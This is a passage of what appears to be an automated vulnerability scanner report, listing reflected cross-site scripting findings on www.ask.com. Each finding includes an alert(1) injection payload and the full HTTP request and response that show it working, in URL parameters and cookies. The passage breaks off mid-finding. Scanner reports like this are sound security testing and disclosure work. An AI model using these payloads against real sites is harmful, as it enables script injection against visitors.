var google_country = '';
var google_encoding = 'utf8';
var google_safe = 'high'
...[SNIP]...
1.9. http://www.ask.com/fifdart [darturi parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ask.com
Path:   /fifdart

Issue detail

The value of the darturi request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b67cf'%3balert(1)//22cd3871f2d was submitted in the darturi parameter. This input was echoed as b67cf';alert(1)//22cd3871f2d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /fifdart?dartsite=5480ask.testsite&dartsitelive=5480.iac.usa.ask.hp.x.x.dir&darturi=ad.doubleclick.net%2fadj%2fb67cf'%3balert(1)//22cd3871f2d&dartsize=300x250&darttile=&darts=as&dartpos=&darthhi=159&darttest=0&dartcata=&dartcatb=&dartcatc=&dartclid=&dartgclient=ca-aj-cat&dartgchannel=&dartgadtype=image%2cflash&dartgadoutput=js&dartgadsafe=high&q= HTTP/1.1
Host: www.ask.com
Proxy-Connection: keep-alive
Referer: http://www.ask.com/?o=0&l=dir
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cu.wz=0; wz_cu=0; tbe=1; accepting=1; user=o=0&l=dir; ldpt=porg=5829|0~5830|0~5832|0~5833|0~5834|0~5488|0~5489|1; wz_uid=0845DB8DB66BB2CFE0A8DECE14D761F3; wz_scnt=1; __utmz=252994457.1300982764.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); wz_sid=0144DB8DB86BB2CFE0A8DECE14D761F3; __utma=252994457.137424121.1300982764.1300982764.1300982764.1; __utmc=252994457; __utmb=252994457.2.10.1300982764; puser=pt=VGh1LTI0LU1hci0yMDExLTE2OjA2OjU5LVVUQw%3D%3D&po=0&pp=dir; skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; qc=0

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: private
Content-Type: text/html;charset=UTF-8
Date: Thu, 24 Mar 2011 16:07:03 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 5435


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN">

<html>
<head>
<title>Dart ad</title>

<style type="text/css">
html, body {
border: 0px;
...[SNIP]...
<script type="text\/javascript" src="http://ad.doubleclick.net/adj/b67cf';alert(1)//22cd3871f2d5480.iac.usa.ask.hp.x.x.dir/;sz=300x250;log=0;s=as;hhi=159;test=0;ord=1300982823595?">
...[SNIP]...
1.10. http://www.ask.com/fifdart [q parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ask.com
Path:   /fifdart

Issue detail

The value of the q request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b3880\'%3b487775315e3 was submitted in the q parameter. This input was echoed as b3880\\';487775315e3 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Request

GET /fifdart?dartsite=5480ask.testsite&dartsitelive=5480.iac.usa.ask.hp.x.x.dir&darturi=ad.doubleclick.net%2fadj%2f&dartsize=300x250&darttile=&darts=as&dartpos=&darthhi=159&darttest=0&dartcata=&dartcatb=&dartcatc=&dartclid=&dartgclient=ca-aj-cat&dartgchannel=&dartgadtype=image%2cflash&dartgadoutput=js&dartgadsafe=high&q=b3880\'%3b487775315e3 HTTP/1.1
Host: www.ask.com
Proxy-Connection: keep-alive
Referer: http://www.ask.com/?o=0&l=dir
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cu.wz=0; wz_cu=0; tbe=1; accepting=1; user=o=0&l=dir; ldpt=porg=5829|0~5830|0~5832|0~5833|0~5834|0~5488|0~5489|1; wz_uid=0845DB8DB66BB2CFE0A8DECE14D761F3; wz_scnt=1; __utmz=252994457.1300982764.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); wz_sid=0144DB8DB86BB2CFE0A8DECE14D761F3; __utma=252994457.137424121.1300982764.1300982764.1300982764.1; __utmc=252994457; __utmb=252994457.2.10.1300982764; puser=pt=VGh1LTI0LU1hci0yMDExLTE2OjA2OjU5LVVUQw%3D%3D&po=0&pp=dir; skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; qc=0

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: private
Content-Type: text/html;charset=UTF-8
Date: Thu, 24 Mar 2011 16:07:18 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 5447


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN">

<html>
<head>
<title>Dart ad</title>

<style type="text/css">
html, body {
border: 0px;
...[SNIP]...
<script type="text/javascript">
var google_ad_client = 'ca-aj-cat';
var google_ad_channel = '';
var google_hints = 'b3880\\';487775315e3';
var google_ad_output = 'js';
var google_max_num_ads = '1';
var google_page_url = '';
var google_ad_type = 'image,flash';
var google_image_
...[SNIP]...
1.11. http://www.ask.com/pictureslanding [l parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ask.com
Path:   /pictureslanding

Issue detail

The value of the l request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e5362'%3balert(1)//6c83d7bc0b1 was submitted in the l parameter. This input was echoed as e5362';alert(1)//6c83d7bc0b1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pictureslanding?o=0&l=dire5362'%3balert(1)//6c83d7bc0b1 HTTP/1.1
Host: www.ask.com
Proxy-Connection: keep-alive
Referer: http://www.ask.com/?o=0&l=dir
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cu.wz=0; wz_cu=0; tbe=1; accepting=1; user=o=0&l=dir; ldpt=porg=5829|0~5830|0~5832|0~5833|0~5834|0~5488|0~5489|1; wz_uid=0845DB8DB66BB2CFE0A8DECE14D761F3; wz_scnt=1; __utmz=252994457.1300982764.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); wz_sid=0144DB8DB86BB2CFE0A8DECE14D761F3; __utma=252994457.137424121.1300982764.1300982764.1300982764.1; __utmc=252994457; __utmb=252994457.2.10.1300982764; skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; qc=0; puser=pt=VGh1LTI0LU1hci0yMDExLTE2OjA3OjAwLVVUQw%3D%3D&po=0&pp=dir

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: private
Content-Type: text/html;charset=UTF-8
Date: Thu, 24 Mar 2011 16:07:15 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: gcht=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: gc=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: user="o=0&l=dire5362';alert(1)//6c83d7bc0b1"; Domain=.ask.com; Path=/
Set-Cookie: puser=pt=VGh1LTI0LU1hci0yMDExLTE2OjA3OjE1LVVUQw%3D%3D&po=0&pp=dire5362%27%3Balert%281%29%2F%2F6c83d7bc0b1; Domain=.ask.com; Expires=Fri, 23-Mar-2012 16:07:15 GMT; Path=/
Set-Cookie: skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; Domain=.ask.com; Expires=Fri, 23-Mar-2012 16:07:15 GMT; Path=/
Set-Cookie: gct=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: qc=0; Domain=.ask.com; Path=/
Content-Length: 60162


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN">
<html>
<head>


<tit
...[SNIP]...



var _matchUrl = '/afc-match?q=&page=1&ac=24&qid=EED0381CB3DE1A4CD1C9D292F4AE1964&qsrc=121&dm=all&qrt=2&lid=5489&o=0&l=dire5362';alert(1)//6c83d7bc0b1';


_matchUrl+= "&userip=173.193.214.243";


_matchUrl+="&losid=a&locid=ph&lodid=us";


...[SNIP]...
1.12. http://www.ask.com/ [wz_cu cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ask.com
Path:   /

Issue detail

The value of the wz_cu cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5c256'-alert(1)-'db57f994a76 was submitted in the wz_cu cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /?o=0&l=dir HTTP/1.1
Host: www.ask.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cu.wz=0; wz_cu=05c256'-alert(1)-'db57f994a76; tbe=1; accepting=1; user=o=0&l=dir; ldpt=porg=5829|0~5830|0~5832|0~5833|0~5834|0~5488|0~5489|1; wz_uid=0845DB8DB66BB2CFE0A8DECE14D761F3; wz_scnt=1; __utmz=252994457.1300982764.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; qc=0; puser=pt=VGh1LTI0LU1hci0yMDExLTE2OjA1OjM4LVVUQw%3D%3D&po=0&pp=dir; wz_sid=0144DB8DB86BB2CFE0A8DECE14D761F3; __utma=252994457.137424121.1300982764.1300982764.1300982764.1; __utmc=252994457; __utmb=252994457.2.10.1300982764

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html;charset=UTF-8
Cache-Control: private
Date: Thu, 24 Mar 2011 16:07:30 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: gcht=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: gc=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: puser=pt=VGh1LTI0LU1hci0yMDExLTE2OjA3OjMwLVVUQw%3D%3D&po=0&pp=dir; Domain=.ask.com; Expires=Fri, 23-Mar-2012 16:07:30 GMT; Path=/
Set-Cookie: skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; Domain=.ask.com; Expires=Fri, 23-Mar-2012 16:07:30 GMT; Path=/
Set-Cookie: gct=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: qc=0; Domain=.ask.com; Path=/
Content-Length: 94938

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN"><html><head><title>Ask.com - What's Your Question?</title><meta name="description" content="Ask.com is the #1 question answering service that de
...[SNIP]...
(this);});if ( $j('#theme_content').length === 0 ) {$j(document).hp_impression('http://wzus1.ask.com/i/i.gif?t=a&d=us&s=a&c=h&ti=2&ai=54316&l=dir&o=0&ld=5489&sv=0a5c404d&ip=adc1d6f3&ord=5682108&wz_cu=05c256'-alert(1)-'db57f994a76');}$j(document).hp_impression('http://wzus1.ask.com/i/i.gif?t=v&d=us&s=a&c=h&l=dir&o=0&ld=5489&sv=0a5c404d&p=homepage&ord=5682108&wz_cu=05c256'-alert(1)-'db57f994a76','http://wzus1.ask.com/i/i.gif?t=a
...[SNIP]...
1.13. http://www.ask.com/ [wz_cu cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ask.com
Path:   /

Issue detail

The value of the wz_cu cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 781e9"-alert(1)-"7361eca1de3 was submitted in the wz_cu cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /?o=0&l=dir HTTP/1.1
Host: www.ask.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cu.wz=0; wz_cu=0781e9"-alert(1)-"7361eca1de3; tbe=1; accepting=1; user=o=0&l=dir; ldpt=porg=5829|0~5830|0~5832|0~5833|0~5834|0~5488|0~5489|1; wz_uid=0845DB8DB66BB2CFE0A8DECE14D761F3; wz_scnt=1; __utmz=252994457.1300982764.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; qc=0; puser=pt=VGh1LTI0LU1hci0yMDExLTE2OjA1OjM4LVVUQw%3D%3D&po=0&pp=dir; wz_sid=0144DB8DB86BB2CFE0A8DECE14D761F3; __utma=252994457.137424121.1300982764.1300982764.1300982764.1; __utmc=252994457; __utmb=252994457.2.10.1300982764

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: private
Content-Type: text/html;charset=UTF-8
Date: Thu, 24 Mar 2011 16:07:29 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: gcht=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: gc=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: puser=pt=VGh1LTI0LU1hci0yMDExLTE2OjA3OjI4LVVUQw%3D%3D&po=0&pp=dir; Domain=.ask.com; Expires=Fri, 23-Mar-2012 16:07:28 GMT; Path=/
Set-Cookie: skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; Domain=.ask.com; Expires=Fri, 23-Mar-2012 16:07:28 GMT; Path=/
Set-Cookie: gct=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: qc=0; Domain=.ask.com; Path=/
Content-Length: 94939

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN"><html><head><title>Ask.com - What's Your Question?</title><meta name="description" content="Ask.com is the #1 question answering service that de
...[SNIP]...
fo || {};WZInfo.pickRedirectDefault = "http://wzus1.ask.com/r?t=p&d=us&s=a&c=h&l=dir&o=0&ld=5489&sv=0a5c404e&ip=adc1d6f3&id=34DCE713F223CA78BB1D757F3FBA4260&q=&p=0&qs=121&ac=24&g=29482SYG0AZ4yY&wz_cu=0781e9"-alert(1)-"7361eca1de3";WZInfo.pickDefault = "http://wzus1.ask.com/i/b.html?t=p&d=us&s=a&c=h&l=dir&o=0&ld=5489&sv=0a5c404e&ip=adc1d6f3&id=34DCE713F223CA78BB1D757F3FBA4260&q=&p=0&qs=121&ac=24&g=29482SYG0AZ4yY&wz_cu=0781e9"-a
...[SNIP]...
1.14. http://www.ask.com/ [wz_cu cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ask.com
Path:   /

Issue detail

The value of the wz_cu cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f2fb9"><script>alert(1)</script>40177c2bbf4 was submitted in the wz_cu cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /?o=0&l=dir HTTP/1.1
Host: www.ask.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cu.wz=0; wz_cu=0f2fb9"><script>alert(1)</script>40177c2bbf4; tbe=1; accepting=1; user=o=0&l=dir; ldpt=porg=5829|0~5830|0~5832|0~5833|0~5834|0~5488|0~5489|1; wz_uid=0845DB8DB66BB2CFE0A8DECE14D761F3; wz_scnt=1; __utmz=252994457.1300982764.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; qc=0; puser=pt=VGh1LTI0LU1hci0yMDExLTE2OjA1OjM4LVVUQw%3D%3D&po=0&pp=dir; wz_sid=0144DB8DB86BB2CFE0A8DECE14D761F3; __utma=252994457.137424121.1300982764.1300982764.1300982764.1; __utmc=252994457; __utmb=252994457.2.10.1300982764

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: private
Content-Type: text/html;charset=UTF-8
Date: Thu, 24 Mar 2011 16:07:28 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: gcht=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: gc=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: puser=pt=VGh1LTI0LU1hci0yMDExLTE2OjA3OjI3LVVUQw%3D%3D&po=0&pp=dir; Domain=.ask.com; Expires=Fri, 23-Mar-2012 16:07:27 GMT; Path=/
Set-Cookie: skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; Domain=.ask.com; Expires=Fri, 23-Mar-2012 16:07:27 GMT; Path=/
Set-Cookie: gct=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: qc=0; Domain=.ask.com; Path=/
Content-Length: 95179

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN"><html><head><title>Ask.com - What's Your Question?</title><meta name="description" content="Ask.com is the #1 question answering service that de
...[SNIP]...
<img src="http://wzus1.ask.com/i/i.gif?t=a&d=us&s=a&c=h&ti=2&ai=54316&l=dir&o=0&ld=5489&sv=0a5c404c&ip=adc1d6f3&ord=5358244&wz_cu=0f2fb9"><script>alert(1)</script>40177c2bbf4" border='0' width='1' height='1' alt="">
...[SNIP]...
1.15. http://www.ask.com/ [wz_uid cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ask.com
Path:   /

Issue detail

The value of the wz_uid cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8dc19'-alert(1)-'8ae2608854 was submitted in the wz_uid cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /?o=0&l=dir HTTP/1.1
Host: www.ask.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cu.wz=0; wz_cu=0; tbe=1; accepting=1; user=o=0&l=dir; ldpt=porg=5829|0~5830|0~5832|0~5833|0~5834|0~5488|0~5489|1; wz_uid=0845DB8DB66BB2CFE0A8DECE14D761F38dc19'-alert(1)-'8ae2608854; wz_scnt=1; __utmz=252994457.1300982764.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; qc=0; puser=pt=VGh1LTI0LU1hci0yMDExLTE2OjA1OjM4LVVUQw%3D%3D&po=0&pp=dir; wz_sid=0144DB8DB86BB2CFE0A8DECE14D761F3; __utma=252994457.137424121.1300982764.1300982764.1300982764.1; __utmc=252994457; __utmb=252994457.2.10.1300982764

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: private
Content-Type: text/html;charset=UTF-8
Date: Thu, 24 Mar 2011 16:07:41 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: gcht=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: gc=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: puser=pt=VGh1LTI0LU1hci0yMDExLTE2OjA3OjQxLVVUQw%3D%3D&po=0&pp=dir; Domain=.ask.com; Expires=Fri, 23-Mar-2012 16:07:41 GMT; Path=/
Set-Cookie: skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; Domain=.ask.com; Expires=Fri, 23-Mar-2012 16:07:41 GMT; Path=/
Set-Cookie: gct=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: qc=0; Domain=.ask.com; Path=/
Content-Length: 94545

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN"><html><head><title>Ask.com - What's Your Question?</title><meta name="description" content="Ask.com is the #1 question answering service that de
...[SNIP]...
<iframe/>');el.attr('src','http://fls.doubleclick.net/activityi;src=2903398;type=homep773;cat=ask_e764;u1=0845DB8DB66BB2CFE0A8DECE14D761F38dc19'-alert(1)-'8ae2608854;u4=;u3=;u2=0;ord=-333468697?').attr('width','1').attr('height','1').attr('frameborder','0');$j('body').append(el);});JASK.namespace("hp.dialogs");$j(document).ready(function() {$j.each(JASK.hp.dialogs
...[SNIP]...
1.16. http://www.ask.com/answers/7153311/is-nail-polish-bad-for-your-nails [wz_cu cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ask.com
Path:   /answers/7153311/is-nail-polish-bad-for-your-nails

Issue detail

The value of the wz_cu cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 50ad9"-alert(1)-"a0bdbc42f40 was submitted in the wz_cu cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /answers/7153311/is-nail-polish-bad-for-your-nails?qsrc=4034 HTTP/1.1
Host: www.ask.com
Proxy-Connection: keep-alive
Referer: http://www.ask.com/?o=0&l=dir
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cu.wz=0; wz_cu=050ad9"-alert(1)-"a0bdbc42f40; tbe=1; accepting=1; user=o=0&l=dir; ldpt=porg=5829|0~5830|0~5832|0~5833|0~5834|0~5488|0~5489|1; wz_uid=0845DB8DB66BB2CFE0A8DECE14D761F3; wz_scnt=1; __utmz=252994457.1300982764.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=252994457.137424121.1300982764.1300982764.1300982764.1; __utmc=252994457; __utmb=252994457.3.10.1300982764; skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; qc=0; puser=pt=VGh1LTI0LU1hci0yMDExLTE2OjA3OjUxLVVUQw%3D%3D&po=0&pp=dir; wz_sid=0144DB8DB86BB2CFE0A8DECE14D761F3

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html;charset=UTF-8
Cache-Control: no-cache
Vary: Accept-Encoding
Date: Thu, 24 Mar 2011 16:12:41 GMT
Connection: close
Set-Cookie: gcht=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: gc=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: puser=pt=VGh1LTI0LU1hci0yMDExLTE2OjEyOjQxLVVUQw%3D%3D&po=0&pp=dir; Domain=.ask.com; Expires=Fri, 23-Mar-2012 16:12:41 GMT; Path=/
Set-Cookie: skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; Domain=.ask.com; Expires=Fri, 23-Mar-2012 16:12:41 GMT; Path=/
Set-Cookie: gct=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: qc=0; Domain=.ask.com; Path=/
Content-Length: 118456


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN">


<html>


<head>
   


...[SNIP]...
();
st.height = 1;
st.width = 1;
st.id = "SessionTracker";
st.src = "http://wzus1.ask.com/i/i.gif?t=v&d=us&s=a&c=qna&l=dir&o=0&ld=5489&sv=0a5c407e&p=ja-question&rf=0&ord=6734329&wz_cu=050ad9"-alert(1)-"a0bdbc42f40";


</script>
...[SNIP]...
1.17. http://www.ask.com/answers/7153311/is-nail-polish-bad-for-your-nails [wz_cu cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ask.com
Path:   /answers/7153311/is-nail-polish-bad-for-your-nails

Issue detail

The value of the wz_cu cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6aabe"><script>alert(1)</script>5f5b1f54996 was submitted in the wz_cu cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /answers/7153311/is-nail-polish-bad-for-your-nails?qsrc=4034 HTTP/1.1
Host: www.ask.com
Proxy-Connection: keep-alive
